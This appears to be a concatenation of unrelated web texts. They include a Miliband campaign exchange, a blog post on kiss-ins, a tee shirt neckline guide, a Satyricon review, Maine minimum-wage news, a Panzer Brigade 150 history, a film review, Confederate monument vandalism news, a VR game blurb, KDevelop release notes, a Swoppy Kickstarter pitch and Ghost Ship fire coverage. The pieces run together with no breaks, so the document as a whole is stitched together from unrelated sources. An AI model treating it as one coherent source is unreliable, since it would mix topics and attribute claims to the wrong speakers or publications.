“Under the Conservatives, we've seen manufacturing returning to our shores, the fastest growth in the developed world and a record number of people with jobs,” Mr Shapps said.
“We'll give the British people the say they deserve with an in/out referendum. Ed Miliband is too weak to even do that.”
THE FULL TRANSCRIPT
Peter Baldwin: “At this moment in time I don't feel like voting Labour."
Ed Miliband: "What's the biggest issue for you?"
Baldwin: "This morning we were sat in the brewery over there [for workers]. They're all leaning now towards Ukip. ... Now, the question on everybody's mind is the referendum. I know what you're going to say, but the working class man in here wants to have a say."
Miliband: "People say immigration is the big issue for lots of people as well, isn't it?"
Baldwin: "Yeah, it's all tied together isn't it."
Miliband: "On immigration what we'd say is that when people come here they shouldn't get benefits for the first few years and then we should ensure that we don't allow wages to be undercut."
Baldwin: "But there's too many people here. That's why we've got all these people out of work. There's too many people here."
Miliband: "But I think we can actually get low skilled immigration down if we cramp down on the benefits and stop the employers exploiting people. Part of the problem we've got - obviously not companies like BAE but other companies - what you end up with is workers being paid less than the minimum wage, you know, 15 people put in a house and all of that and people say: ‘Well, hang on a minute, that can't be right, we've got to do something about that.' Anyway, very nice to meet you. Take care."
Remember those Islamic protesters at the Global Atheist Convention? I neglected to mention this excellent response to their gibberish, courtesy of Gregory Storer:
My partner Michael and I took advantage of the moment to kiss in front of the group. We understand that in some Islamic States gay people are persecuted and executed for their sexuality. It was an ideal opportunity to challenge the notion of acceptance and tolerance. As we began kissing, the muslims began chanting, burn in hell.
In fact, kiss-ins are really popular ways to draw attention away from homophobes. Plus, it just pisses them off. Win-win!
It's happened with the Pope…
… and in front of campus preachers…
… and just for the sake of solidarity with the LGBT community:
They should just have these kiss-ins at every Mitt Romney campaign event…
Posted: Apr 28 2014
The tee shirt is about as ubiquitous of a garment as there'll ever be. People just love wearing tee shirts and over time, they've continued to find new ways to sport the tee. What has always been worn as an undershirt then also started to be worn on its own, but primarily by those with certain jobs that allowed for it to be worn. But today, the tee shirt is worn everywhere, by everyone, and in seemingly every environment. We've gone on a tee spree, and I'm not sure about you, but I sure as heck hope it never stops.
As the tee has evolved, so have the number of options that one has when buying one. There are a number of styles, fabrics, and even, necklines, to choose from. With more options come more choice; but with more choice comes more confusion and uncertainty. Luckily, you can't really go wrong, but this week we'll highlight some of the things to take into consideration when buying a tee and today, we'll start with necklines.
The Crewneck
The crewneck: that which is tried and true; one that will never let you down; the garment that we all know, and most of us love. In summary, that's the crewneck.
The crewneck tee is the most common and standard tee. It's the one that started it all yet over time, while it's never lost sight of its roots, it too has evolved. Over the years, as we moved from the “tees = undershirt” era to the “tees = potentially everything” era, the neckline of the crewneck tee has dropped ever so slightly, to add some comfort to the standalone tee, and to pose a serious threat to the revealing v-neck tee, often worn by those looking to show the world what their momma gave them. But that's not to say that those who long for the good ole' days can't find a basic, undershirt that fits like the one your grandfather once wore. Undershirts are still primarily made the way the used to be, with the high, conservative, semi-suffocating (in a good way) neckline.
But, for the most part, the tee of the 21st century, even in its crewneck form, has evolved. The neckline is a bit looser and lower, yet still structured. And a well made tee's neckline should stay that way even after wash and wear. It shouldn't loosen significantly or tighten materially after wear or wash. So, rest easy knowing that if you invest in a quality tee, how it fits your neck today should be a pretty accurate indication of how it will fit tomorrow.
V-Neck
The v-neck tee is relatively new, when it comes to the history of tees and as a result, it's still evolving and finding its place in the tee shirt world. But today, the v-neck tee can generally be categorized as either a “deep v” or “regular v.”
The v-neck tee, as mentioned earlier, is a newcomer to the game and it took off no more than a decade ago, in reaction to what was then the only crewneck option: a restrictive and high necked shirt. So, the v-neck was a lot of what the crewneck wasn't, but the most prominent difference between the two was, as evident by its name, the neckline. The v-neck had a v-shaped neckline, with an “opening,” if you will, near and below the Adam's apple. Initially, this entrant into the market made some groups delighted, and others uncomfortable. But, over time, the v-neck, like the crewneck, evolved and separated into two camps: the deep v and the standard v.
The standard v-neck shirt became more accepted and popular among the masses, serving as a welcome respite from the crewneck. The v-neck also gave those who wanted to show some skin, or highlight their physique, a safe, comfortable way to do so.
For those who wanted to highlight their physique in a prominent way, the deep v emerged as a viable alternative to the tank top. In fact, the tank top and deep v differ so greatly that perhaps it's unfair to call one an alternative to the other. Nonetheless, the deep v mirrored its v neck brethren when it came to length, etc., but was a stark contrast when it came to the neckline. The deep fell 2-3 inches below the standard v and has never fully been integrated into mainstream culture in the same way the v-neck tee has. That being said, if you're looking for something to highlight your body in a prominent way, the deep-v can be found on the streets of fashion forward places and occasionally, even on the streets of other cities.
Roll Neck
I am fairly partial to a well-made roll neck tee shirt, but it has to be a well-made one.
The roll neck tee couldn't be called a happy medium between the crewneck and the v-neck as it resembles the crewneck tee much more closely, but it can be compared to the v-neck in the sense that like the v-neck tee, it offers some more comfort and space around the neckline.
A roll neck tee has characteristics of an unstructured garment, but it's anything but unstructured or unthought out. A well-made roll neck tee is not unfinished, it's deliberately finished and the less formal features of the shirt - wider neckline, looser neck - have their benefits. Primarily comfort.
Furthermore, a well made roll neck tee will maintain its shape over time, despite what one might assume after a cursory glance.
So, in my eyes, the roll neck is the best of all options.
That being said, whether you go with the crewneck, v-neck, or roll neck, you're purchasing a garment that can be worn anywhere by anyone.
Satyricon was the first Fellini film I ever had the pleasure of viewing and, though I consider Fellini a true master, it has remained my favorite after repeated viewings. In fact, it easily tops my favorite films having spoken to me on so many levels about the importance of the cosmic fool, the charm of the scoundrel, the familiar sting of betrayal, and the importance of myth. I've witnessed many viewers daunted by the fragmented nature of the film, mirroring the incomplete shards of mythology provided by the classic Petronius epic. But I'm somewhat offended when I hear someone slag Satyricon off as pretentious because I connect to it so strongly. I recognize the questionable nature of making such a bold statement about a movie that basically follows the exploits of two degenerates in the age of Nero involved in an often literal tug of war over the affections of a teenage boy. But there are such colorfully melancholy truths beyond the details.
Science Fiction of the Past
The aesthetic of Satyricon was accurately described by Fellini as “science fiction of the past.” Shrill horns merge with atmospheric synths as unsettling gazes stare directly from the screen at you, constantly breaking the fourth wall as if you are some alien observer. Fellini's depiction of Rome in the age of Nero flows like a casual nightmare with monolithic tenements jutting forth from ever-present shadows. The characters seem as disoriented as the viewer, falling from one absurd situation into another, asking disjointed questions such as “Do you know where I live?” Some characters speak undecipherable languages while the dubbed voices carry on strange conversations forcing the spectator into the role of the stranger in the strange land. My DVD offers dubbed and subtitled options but I find the dubbed version far superior, with lines such as “he sits down to piss as if he'd never been born a man” and a vicious fight between former friends ending with an exasperated “I'm sorry, love.” This unforgiving apocalyptic landscape is almost a character in itself yet serves as the lightbox that so gorgeously contrasts the archetypes I adore.
AUGUSTA — A labor researcher said Monday that Maine business organizations used faulty math and misinterpreted his work to support a more modest counterproposal to the $12-an-hour minimum-wage ballot question likely headed to voters this November.
But a spokesman for the Maine State Chamber of Commerce defended his coalition's $10-an-hour proposal, which he said is supported by the business community and is less likely to impose a burden on employers.
The conflicting narratives came days before the Legislature will decide whether Maine voters will see one or two proposals this fall to increase Maine's minimum wage.
The progressive Maine People's Alliance and labor unions collected enough petition signatures for a ballot question asking voters to increase Maine's minimum wage from $7.50 to $12 an hour by 2020. Business groups, however, are hoping to use the “competing measure” option available under the Maine Constitution to propose a wage hike to $10 an hour in 2020, which would appear alongside the $12-an-hour ballot question.
The Maine People's Alliance once again sought to undercut the competing measure Monday by questioning the math behind the $10-an-hour wage.
Professor Michael Reich of the University of California at Berkeley's Institute for Research on Labor and Employment suggested that the two business groups were misinterpreting the institute's work in order to justify their more modest wage increase.
“It seems to me their arguments for a $10-an-hour minimum wage by 2020 are actually more appropriate … for the $12 minimum wage,” Reich said during a conference call with reporters Monday.
On several occasions, including in a March 2 press release, the business coalition cited the research institute's studies in claiming that “if minimum wages are raised to no more than 60 percent of median wages, the net economic benefit is largely positive to both workers and business owners.” The business groups argued that their $10-an-hour proposal is more likely to have a positive benefit on workers and employers than the $12-an-hour proposal.
But in a letter dated last Friday and during a telephone call Monday, Reich said the business groups were using the wrong dataset. Instead of using the projected median wages for all workers in 2020 – including part-time and seasonal workers – the business coalition should have made its computations based on the median hourly pay for full-time workers, Reich said.
The projected median wage in Maine for full-time hourly workers in 2020 is $21.23. The $12-an-hour minimum wage would equal 57 percent of that median wage, just shy of the 60 percent cited by the institute.
By comparison, the business coalition is using $16.29 as the projected median wage for 2020. That puts the $10-an-hour minimum wage proposal just below the 60 percent tipping point cited by Reich.
“I request that you issue public corrections regarding both your arithmetic error and your misinterpretation of the minimum wage scholarship of the Institute for Research on Labor and Employment,” Reich wrote to the groups on March 11.
Representatives for the Maine State Chamber of Commerce and the Maine Restaurant Association said they would review the institute's work and their characterization of it in their media materials.
But Peter Gore, vice president of the Maine State Chamber, accused the Maine People's Alliance of “cherry-picking” numbers in order to arrive at a higher median wage. By only including full-time workers in that calculation, Gore said, they are excluding Maine's many part-time workers. Gore noted that one of those workers, a woman who works three part-time jobs, spoke during the Maine People's Alliance news conference.
“They don't want to include her wages in the calculation of the median wage. That's just cherry-picking the numbers,” Gore said. “We think we have a more honest and complete picture of what the median wage ought to look like.”
Gore also pointed to a survey of roughly 200 Skowhegan-area businesses by the local chamber of commerce as proof that businesses were on board with their proposal. Roughly 75 percent of the businesses that responded said they would support the business coalition's proposal over the $12-an-hour plan. Additionally, 59 percent of the business owners said they would be less likely to hire new employees at $12 an hour, and more than 40 percent indicated they might have to shed workers.
Mainers should expect to see a slew of political and parliamentary maneuvering in the coming days on the minimum wage issue.
Lawmakers are expected to send the $12-an-hour proposal directly to voters rather than approve it themselves. Republican legislators plan to try to introduce the business coalition's $10-an-hour “competing measure,” but are likely to face opposition in the Democrat-controlled House.
Share
Panzer Brigade 150 or SS Panzer Brigade 150 (German: 150. SS-Panzer-Brigade) was a formation of the German Army during World War II that was formed to take part in the Ardennes offensive, it was unusual in that it was formed from all parts of the German Armed Forces, the 2,500 men in the brigade were formed from; 1,000 from the Heer, 500 from the Waffen SS, 800 from the Luftwaffe and 200 from the Kriegsmarine.[citation needed] It was tasked with the capture of the bridges at Amay, Engis and Huy. The Brigade is known for including English-speaking members wearing American Army uniforms to cause disruption and disinformation behind the American lines. The Brigade was also issued captured Allied equipment and had two Sherman tanks (which never saw action due to mechanical problems) and German vehicles were modified to resemble Allied armoured vehicles.
Operation Greif [ edit ]
The German code name for this unit's role in the Ardennes offensive was Operation Greif. The timing of the offensive meant that the Brigade Commander Otto Skorzeny had only 5 or 6 weeks to recruit and train a brand-new unit. Within four days he sent his plans for 150 Panzerbrigade to General Alfred Jodl. Despite asking for 3,300 men he was given an immediate go-ahead and promised full support. The Oberkommando der Wehrmacht issued an order on 25 October requesting suitable soldiers for the operation with "knowledge of the English language and also the American dialect" which was passed on to every headquarters on the Western Front, and this request soon became known to the Allies.[1]
The new brigade needed US Army vehicles, weapons and uniforms; OB West was asked to find 15 tanks, 20 armoured cars, 20 self-propelled guns, 100 Jeeps, 40 motorcycles, 120 trucks, and British and US Army uniforms all to be delivered to the brigade's training camp which had been set up at Grafenwöhr in eastern Bavaria. The equipment delivered fell short of the requirements, including only two Sherman tanks in poor condition, and Skorzeny had to use German substitutes, 5 tanks and 6 armoured cars. The brigade was also flooded by Polish and Russian equipment sent by units who had no idea what the request was for. As far as English-speaking soldiers went, only 10 men who spoke perfect English and had some knowledge of American idiom were found, 30-40 men who spoke English well but had no knowledge of slang, 120-150 who spoke English moderately well, and 200 or so who had learned English at school.
Faced with these setbacks, Skorzeny scaled down Panzer Brigade 150 from three battalions to two and assembled the 150 best English speakers into a commando unit named Einheit Stielau.[citation needed] Skorzeny also recruited a company of SS-Jagdverbände "Mitte" and two companies from SS-Fallschirmjäger-Battalion 600, and was given two Luftwaffe parachute battalions formerly of KG 200, tank crews from Panzer regiments, and gunners from artillery units. A total of 2,500 men were eventually assembled at Grafenwöhr, 800 less than had been hoped.
The final total of equipment assembled was also less than had been hoped; only enough US Army weapons had been found to equip the commando unit, and only 4 US Army scout cars, 30 Jeeps, and 15 trucks were found, the difference being made up with German vehicles painted in US olive drab with Allied markings applied. Only a single Sherman tank was available, and the brigade's Panther tanks were disguised as M10 tank destroyers by removing their cupolas and disguising their hulls and turrets with thin sheet metal. The problem of recognition by their own forces was crucial, and they were to identify themselves by various methods: displaying a small yellow triangle at the rear of their vehicles; tanks keeping their guns pointing in the nine o' clock position; troops wearing pink or blue scarves and removing their helmets; and flashes from a blue or red torch at night.[citation needed]
As the brigade prepared for action, rumours began to fly that they were to relieve the besieged towns of Dunkirk or Lorient, capture Antwerp, or to capture the Allied Supreme Command at SHAEF at Paris.[2] It was not until 10 December that Skorzeny's own commanders were made aware of the brigade's true plans. Panzer Brigade 150 was to attempt to capture at least two of the bridges over the Meuse river at Amay, Huy, and Andenne before they could be destroyed, the troops to begin their operation when the Panzer advance reached the Hohes Venn, between the Ardennes and the Eifel highlands. The three groups (Kampfgruppe X, Kampfgruppe Y, and Kampfgruppe Z) would then move towards the separate bridges.
When Unternehmen Greif started, the brigade was held up in the massive traffic jams which caused major problems to the entire offensive. After losing two days this way, the original goals of the brigade was more or less given up and it was to fight as a regular formation.
It was given the task of capturing Malmedy, but a deserter warned the US forces of the plans. The attack was met with heavy fire and the Germans were forced to retreat. The US artillery took a heavy toll on the unit even when it was withdrawn from the actual fighting, the wounded included Otto Skorzeny himself who was hit by shrapnel.
Aftermath [ edit ]
The brigade was finally withdrawn from the front lines on 28 Dec, being replaced by 18th Volksgrenadier Division. 44 German soldiers wearing U.S. uniforms managed to slip through U.S. lines and all but 8 returned alive. Another 23 of its men were captured and 18 were executed as spies.[3]
After World War II, Skorzeny was tried as a war criminal at the Dachau Trials in 1947 for allegedly violating the laws of war during the Battle of the Bulge. He and nine officers of the Panzerbrigade 150 were charged with improperly using American uniforms by entering into combat disguised therewith and treacherously firing upon and killing members of the United States Armed Forces. They were also charged with participation in wrongfully obtaining U.S. uniforms and Red Cross parcels consigned to American prisoners of war from a prisoner-of-war camp. Acquitting all defendants, the military tribunal drew a distinction between using enemy uniforms during combat and for other purposes including deception; it could not be shown that Skorzeny had actually given any orders to fight in U.S. uniforms.[4] Skorzeny said that he was told by German legal experts that as long he doesn't order his men to fight in combat while wearing U.S. uniforms, such a tactic was a legitimate ruse of war.[5] A surprise defense witness was F. F. E. Yeo-Thomas, a former Allied SOE agent, who testified that he and his operatives wore German uniforms behind enemy lines.
Commanders [ edit ]
Oberstleutnant Hermann Wulf (1944 – 14 December 1944)
SS-Obersturmbannführer Otto Skorzeny, (14 December 1944 – January 1945)
References [ edit ]
Bibliography [ edit ]
Yasmine Buy posters from this movie by Jay Seaver
"Kids learning about themselves through martial arts, Brunei-style."
SCREENED AT THE 2014 FANTASIA INTERNATIONAL FILM FESTIVAL: A lot of what audiences see in "Yasmine" will be fairly familiar and predictable, but give the filmmakers a little slack - it's the first movie that the nascent film industry in Brunei Darussalam has produced, and it doesn't hurt to walk before you run. This is a pretty decent teen sports movie, and its high points are pretty good. It starts with the title character (Liyana Yus) discovering that she won't be going to college with her high school friends because her father Fahri (Resa Rahadian) doesn't make enough as a librarian to secure the needed loan. It's bad enough that her friends start to drift away, and worse when Adi Rahman (Aryl Falak), a boy she likes who is also a rising star in the martial art of silat, starts paying more attention to his teammate Dewi (Mentari De Marelle). The only thing to do is join her school's silat club and do well enough to get Adi to notice her again - not so easy when her only teammates are stuffy Ali (Roy Sungkono) and bulky Nadia (Nadiah Wahid), it's quite possible that the club's adviser doesn't know anything about silat at all and the only other master they find who will teach them, Jamal (Agus Kuncoro), is in a wheelchair. Oh, and Fahri has forbidden Yasmine to have anything to do with silat at all.
Events in the main story don't always happen right on schedule, but they cover the basics - Yasmine starts out fairly irresponsible and full of herself, makes new friends, has success go to her head, and finds out that there's more to her father than she was aware of. For the most part, those bits are comfortable but not rote, especially since the details of how this plays out in Brunei are new to most in the international audience - it's an Islamic country, but one where women appear to have equal rights. The setting is quite beautiful but also a lived-in city. Some bits of the scripts seem to be stretched a bit far, such as Yasmine seeking "the dark master", and there will sometimes be what seem like weeks of stuff going on between scenes that are referred to as days apart, but it's fairly well-done overall.
And even though the character can often seem a little self-centered, Liyana Yus is a great discovery as Yasmine. She brings a great deal of energy to the role, with the lightness of a young woman who is facing her first real challenges; even if she's not always handling them well, it's in a way that makes the audience hope for better. She's got a nice chemistry with Aryl Falak as her father; he gets across the idea of a guy with strong convictions where the urge to be strict with his daughter doesn't exactly come naturally. The cast is well filled-out, too, with Mentari De Marelle playing Dewi as an enjoyably sharp rival and Nadiah Wahid is pretty good as Yasmine's new friend.
They've all put in the work to become proficient at silat as well, so the matches which punctuate the film's second half - directed and choreographed by Chan Man Ching, a veteran of Jackie Chan's team - are quite strong. It's a martial art where moving into position and posing, ready to spring, are quite important, so it looks great even though it can erupt into quick violence (this is what Iko Uwais uses in The Raid). The characters all have their own styles, and it's a nifty surprise to see Nadia attack like a freight train even as Yasmine is doing moves that call to mind the dancer she is referred to as early on. There's personality to these sequences, which makes them even more of a satisfying climax. So, sure, you've probably seen the likes of "Yasmine" before, but it's done well and offers a fresh enough perspective to merit a look. Brunei may be new at this, but I suspect one can expect good things from Siti Kamaluddin and Liyana Yus, at the very least, going forward.
link directly to this review at http://www.efilmcritic.com/review.php?movie=27639&reviewer=371
originally posted: 07/27/14 00:27:14
printer-friendly format OFFICIAL SELECTION: 2014 Fantasia International Film Festival For more in the 2014 Fantasia International Film Festival series, click here.
OFFICIAL SELECTION: 2014 Hawaii International Film Festival For more in the 2014 Hawaii International Film Festival series, click here.
You must enter the characters with black color that stand out from the other characters
— A monument in Maplewood Cemetery in Durham honoring local Confederate soldiers was vandalized overnight.
"Black Lives Matter" and "Tear It Down" were spray-painted on the granite marker, which was put up in May to honor all veterans who fought for the Confederacy in the Orange County area during the Civil War.
Douglas Nash, commander of the Pvt. Lorenzo Leigh Bennitt Camp 773 of the Sons of Confederate Veterans, which put up the $3,000 monument, said he was saddened by the vandalism.
"Black lives do matter. Take it down is definitely not the way to go," Nash said. "It's not like we are honoring the Nazis who have committed atrocities. The folks from the South were simple folks who felt they were being invaded. It had nothing to do with slavery. It just saddens me to no end to see things like this happen."
Maplewood Cemetery, off Duke University Road near Duke's West Campus, is owned by the city of Durham, and officials said the gates are locked daily at 3:45 p.m.
Durham police are investigating the crime.
SCV member Stewart Dunaway spent part of Wednesday scrubbing and power-washing the marker to remove most of the damage. City crews were able to remove what he couldn't
"I'm disappointed but not surprised," Dunaway said. "The horrific event at Charleston obviously has caused a lot of issues to resurface about the role of the Confederates."
Nine people attending a Bible study class at a historic black church in Charleston, S.C., were killed on June 17, and a white supremacist who posed in online photos with the Confederate battle flag has been charged in the shooting.
"When you go to school, you see this overshadowing dislike or hatred to the Confederacy, and that general view (is) attaching it directly to slavery," said Dunaway, who had ancestors from Florida who fought for the South in the Civil War.
"I have pride that my relatives were willing to take a stand," he said. "What frightens me is that, when history is going to be altered to be politically correct or to follow a path that people think is the right way to report it, people never get a balanced history. As soon as we start to alter history to paint a different picture, the truth isn't known."
But William Barney, a history professor at the University of North Carolina at Chapel Hill and an expert on the antebellum South, said the truth is that the Civil War was explicitly about slavery and white supremacy.
"It was exceedingly difficult, if not impossible, for a majority of Southern whites after the war – and now – to openly state we fought the war in order to maintain a vast system of human bondage," Barney said. "It's very difficult to confront the central reality. That means looking it in the face. That's very difficult to do. We'd rather come up with defenses – 'Oh, it's all about states' rights.'"
The battle flag became a symbol to justify the "holy cause" of the war for the South, he added.
The SCV group picked Maplewood Cemetery for the memorial because members have also upgraded sections of the cemetery with markers for veterans, Nash said. Members also have ceremonies at the cemetery to honor their ancestors, he said.
"Imagine, if you will, in May your father died or mother died or someone special to you died. You put up a nice headstone, and someone has gone and vandalized it. It just makes no sense," he said.
About This Game VRQB is the definitive arcade VR football experience. You are the quarterback, driving down the field while racking up as many points as possible. Experience the excitement of classic arcade football from the quarterback's perspective!
Players can choose from five different footballs that each offer their own unique play style. VRQB currently features three game modes with three different difficulty levels: Classic, Two Minute Drill, and Scramble. Classic In Classic mode, the player drives down the field by hitting groups of three targets spread out across the field. Clearing each set of targets gives the player a first down, enabling the player to move down the field. The player tries to reach the end zone while increasing their multiplier by hitting consecutive targets. Two Minute Drill In the Two Minute Drill, the player has two minutes to score as many points as possible. The player has the option of hitting three different targets, moving to the location of the target hit. Players must weigh hitting the closer, reliable targets to build up a streak multiplier, or airing it down the field and going for the big gain. Scramble In Scramble mode, the player dodges the VRQB tackling dummies while trying to score as many touchdowns as possible. Be careful, as after each touchdown scored, the dummies will increase their speed and spawn rate. You can be tackled three times before your round is over, so don't give up after taking your first hit!
Try to beat your own scores on the local leaderboard, or try to be the top in world on the online leaderboard!
Four weeks after the release of KDevelop 5.0.1, we are happy to announce the availability of KDevelop 5.0.2, a second stabilization release in the 5.0 series. We highly recommend updating to version 5.0.2 if you are currently using version 5.0.1 or 5.0.0.
Along with the source code, we release an updated 64-bit AppImage for Linux as well as updated installers for Microsoft Windows. We've got the pleasure to announce a 32-bit version of KDevelop for Windows now, too!
You can find all the downloads on our download page.
Notable issues fixed in 5.0.2 are:
Fix a locking issue in the background parser, causing frequent crashes on Windows (3c395340d)
Fix broken search in the documentation view (0602281c)
Fix various issues with the breakpoints view (cba54572)
Fix a possible crash when activating a clang FixIt (BR: 369176)
Fix a crash when performing various actions with the Make plugin disabled (BR: 369326)
Fix text files being parsed as CMake under some circumstances, leading to bad performance and crashes
Use correct font in documentation view (BR: 285162)
Fix a crash when clicking "Rename declaration" without an editor being open (22bdccb1)
Fix "Download more ..." feature not working on some systems (4c4500bf)
Fix "Select next/previous toolview" behaving incorrectly in some cases (24d3e3bb)
Fix "Hide/Restore docks" behaving incorrectly in some cases (daeed5f1)
Fix "Install as root" action not working (30a66c3f)
Fix CMake build plugin sometimes rebuilding everything when it should not (17b6499e)
Various UI improvements.
Fixes in the Windows installers:
Update Sonnet in the Windows installer which led to crashes when turning on Automatic Spell Checking [BR: 370470]
Fix heap corruption after start / immediately after opening folder [BR: 370495]
The source code can be downloaded from http://download.kde.org/stable/kdevelop/5.0.2/src/.
You can find the binaries for Windows and Linux on our download page.
The source code archives and their sha-256 checksums are
24ec89b4edc854808ce11a8e8b0aeb853f11926b26029bc46c80f901da00aec7 kdev-php-5.0.2.tar.xz 5d160951933e2f6742a443e19d24e0c93a82567244500e4bb6a3124e5e4e11ff kdev-python-5.0.2.tar.xz 9b017901167723230dee8b565cdc7b0e61762415ffcc0a32708f04f7ab668666 kdevelop-5.0.2.tar.xz a7f311198bb72f5fee064d99055e8df39ecf4e9066fe5c0ff901ee8c24d960ec kdevplatform-5.0.2.tar.xz
Simple; the classic games of the past still have their place today.
Don't own any games? You can find some free and open source Game Boy ROMs from:
The Swoppy case is fully recyclable, as well as designed and made in New Zealand. No electronics or batteries are involved! The setup process is easy:
To get going with the Swoppy web app, all you need to do is download our app and connect to Dropbox! Most excitingly, our web app is compatible with most phones (Android and iOS) and is specially designed for and included with every Swoppy case.
Our Swoppy web app allows you to play your Game Boy games on your phone. This means you can play all your classics games like Pokémon, Tetris, Super Mario Land, Zelda and more! If you don't own any games, no worries; there are plenty of free and open source games to choose from!
The Swoppy case uses great engineering and a durable material (most likely a material called Santoprene ) to protect your phone but our tactile buttons that interact with your phone's screen are the truly exciting bit. This combination alongside our Swoppy web app brings the joy of the past back to the now. Your phone is now also a handheld console.
In our very hectic world, we all look for fun and escape from our daily lives. Often this is best done through looking back to the simple yet rich games of the past.
Why Swoppy?
Games should be able to be played anywhere, anytime. Straight from your pocket into your hands! Smartphones have made this all possible by making portable gaming accessible to almost anyone.The problem is smartphones have sacrificed our ability to fully experience some of our games. Many classic 8-bit or 2d games were not designed to be experienced on a touchscreen, but with physical buttons instead. All we are left with now are many frustrating experiences; death by failed virtual button push anyone? Tactile buttons provide the satisfying feeling of knowing your actions have the intended consequences; you know you are in control! By combining a protective case with buttons that can interact directly with your phone screen we have brought back tactile gaming. Swoppy allows you to play games that can only truly be experienced with physical buttons! Game Boy emulators have been around for some time now. Yet many of us still are unable to play our Game Boy games on our phones! Why? The key issue is emulators phone apps available today require you to go through a risky and time-consuming process (acquiring software “root” access). Who has the energy to figure that out? Generally, only hobbyist and geeks like us! Our Swoppy web app emulator makes it simple to start playing your Game Boy Original and Color games.
Why Kickstarter?
Hardware is hard, especially for 9 different iPhone models. Because of the high costs involved in injection moulding the cases, we need to be able to fulfil a minimum order in order to be able to push forward forwards with Swoppy. We see Kickstarter as a great way to cover the expensive tooling/manufacturing processes for our cases.
We live here.
We also live in Middle Earth (New Zealand) which is very far away from the rest of the world. While we are surrounded by beautiful scenery and awesome people, we want to open up and connect Swoppy with the world! We think everyone should be able to become a part of our story!
Rewards
Contributor Pixel
Own your pixel
Swoppy Web App
Get our Swoppy web app for NZ$10
What is it?
Allows you to play your Game Boy games on your phone.
Can play Pokémon, Tetris, Super Mario Land, Zelda and many more!
Just connect and plug your Game Boy Original or Color ROMs into Dropbox and start playing!
Supported phone models?
Guaranteed to work with iPhones: 5, 5s and SE 6, 6s and 7 6 plus, 6s plus and 7 plus.
Designed to work with other phones including most Android phones.
Disclaimer: Will not be fully tested with a guarantee for all Android phones.
Swoppy Pack
Swoppy Case & Web App Pack (AKA "Swoppy Pack")
What is it?
Transforms your phone into a physical Game Boy.
Swoppy web app included.
Protects phone against knocks, drops and scrapes.
8 soft tactile buttons. No electronics or batteries are involved!
Fully recyclable. Designed and made in New Zealand.
Supported phone models?
Swoppy cases only available for iPhones: 5, 5s and SE 6, 6s and 7 6 plus, 6s plus and 7 plus.
Party
All inclusive success party with founders in Christchurch, NZ. You will not leave thirsty or hungry!
Swoppy with USB Roulette
Get behind the scenes material and random stuff we enjoy on a USB
Hand Illustrated Swoppy
by the talented BeckyBoo
Every case will be unique!
Swoppy with Mixtape
We love retro! What's nicer than someone making a mix-tape just for you?
Swoppy Custom Case
Your custom case here!
What is it?
We will build a custom 3D printed Swoppy case that fits your phone.
We will create a custom Swoppy web app start screen.
Both Swoppy case and web app start screen will be customised to your preference.
Disclaimer. Will be subject to:
Your phone model's technical specifications.
Our ability to measure and/or obtain your phone's dimensions.
Stretch Goals
Let's make it colour!
Want more case color options? Different colors will be made available when we reach NZ$79,000+
Different colors will be made available when we reach Want a Swoppy but don't have an iPhone? We add phone models as soon as we reach enough interest. Request your phone now!
How will Swoppy be delivered?
We'll get Swoppy in your hands asap!
Product development went on for the last 9 months. We improved the product with lots of passion and attention to detail, invested time and our savings to get Swoppy ready to release it into the wild! Now you can help us get it to production.
Prototyping - our silicon mould
With the Swoppy cases, we've organised production with a local manufacturer in New Zealand and put together multiple plans for international delivery. By building in New Zealand, we keep carbon emissions low while being able to deliver Swoppy cases using high-quality materials and processes. All cases will be fully recyclable, too.
Programming - our Emulator
With the Swoppy web app, all development is done in-house. The Game Boy emulator is ready to go! Our Swoppy web app will be accessible through our website so no need to wait for shipping!
Timeline
The past and future
Who are we?
Team Swoppy Our team of three is passionate and positive. We tackled all the challenges and jumped the hurdles and we are excited about the things to come Our team of three is passionate and positive. We tackled all the challenges and jumped the hurdles and we are excited about the things to come
Regina is our Chief Unicorn Wrangler. She is a serial entrepreneur with a design background. Regina makes sure that the work gets done! She has built Swoppy's identity focusing on producing a sustainable product of high quality.
Aydin is our Lord Commander of Hacking. He loves making things! With a technical background in maths, science and engineering he is pushing to make Swoppy a reality!
Update, Monday, Dec. 5, 8:55 a.m. A talented visual artist from Berkeley who made a name for himself in the international electronic music scene is reportedly among those killed Friday night in the Ghost Ship warehouse fire in Oakland. Friends and former classmates have planned a “candlelight and laser vigil” Monday night for 34-year-old Jonathan Bernbaum at USC's School of Cinematic Arts. He graduated from the program in 2008.
The confirmed death toll has risen to 36, and authorities have suspended recovery efforts until Monday afternoon due to unsafe conditions. Read more.
Update, 6:15 p.m. The city of Oakland has released the first seven names of those killed during the Ghost Ship warehouse fire Friday night. They are Oakland residents Cash Askew, 22, David Cline, 35, Travis Hough, 35, and Donna Kellogg, 32; Brandon Chase Wittenauer, 32, of Hayward; Nick Gomez-Hall, 25, of Coronado; and Sara Hoda, 30, of Walnut Creek.
Cline and Gomez-Hall had Berkeley ties and further information about them appears below.
Kellogg worked at Berkeley's Highwire Coffee Roasters and was well-known to many in the community. She was a barista at Highwire's coffee trailer at Solano Avenue's Flowerland nursery. Said one community member, “She made a lot of people their coffee and will be deeply missed by customers, coworkers and friends.”
There have been reports that the fire broke out near a wooden stairway made of pallets that was the only link between the first and second floors of the artist collective, which has been described as a rabbit warren and, ultimately, a tinderbox due to its cramped collection of wooden furniture, sculpture and other materials. The main party area, where musicians were performing and people were dancing, was on the second floor.
One friend, writing Sunday about Kellogg on Facebook, said, “Donna was on the second floor. She was a beautiful giggly, wise, person who will be very missed.”
Highwire has asked for privacy during “the very difficult process of absorbing the horror of what has happened” and being able to grieve.
According to the city, one of the victims is a 17-year-old whose name will not be released because he or she was a minor.
Original story, 3:58 p.m. Two friends from UC Berkeley, two UC Berkeley alumni and one staff member from a West Berkeley publishing house are among the dozens reported dead or missing after the three-alarm fire that tore through an Oakland warehouse during a party at an artist collective late Friday night.
All five have been reported missing by friends or family online. They are Nick Gomez-Hall, 26, administrative assistant at Counterpoint Press; UC Berkeley alumni Griffin Madden, 23, and David Cline, 24; and current UC Berkeley students Vanessa Plotkin and Jenny Morris. According to their Facebook pages, Cline and Plotkin are also Berkeley residents.
Plotkin had just begun studying sociology at UC Berkeley in August, according to her Facebook page. Morris, who lived in San Mateo, also began attending UC Berkeley this year, according to her profile page on Facebook. The two were friends, according to their Facebook pages.
Madden graduated from Cal in 2015 with bachelor's degrees in both philosophy and slavic languages and literature, according to the UC Berkeley alumni directory. Cline also graduated last year with bachelor's degrees in cognitive science and computer science, according to the same source. Cline is from Santa Monica and Madden from San Francisco.
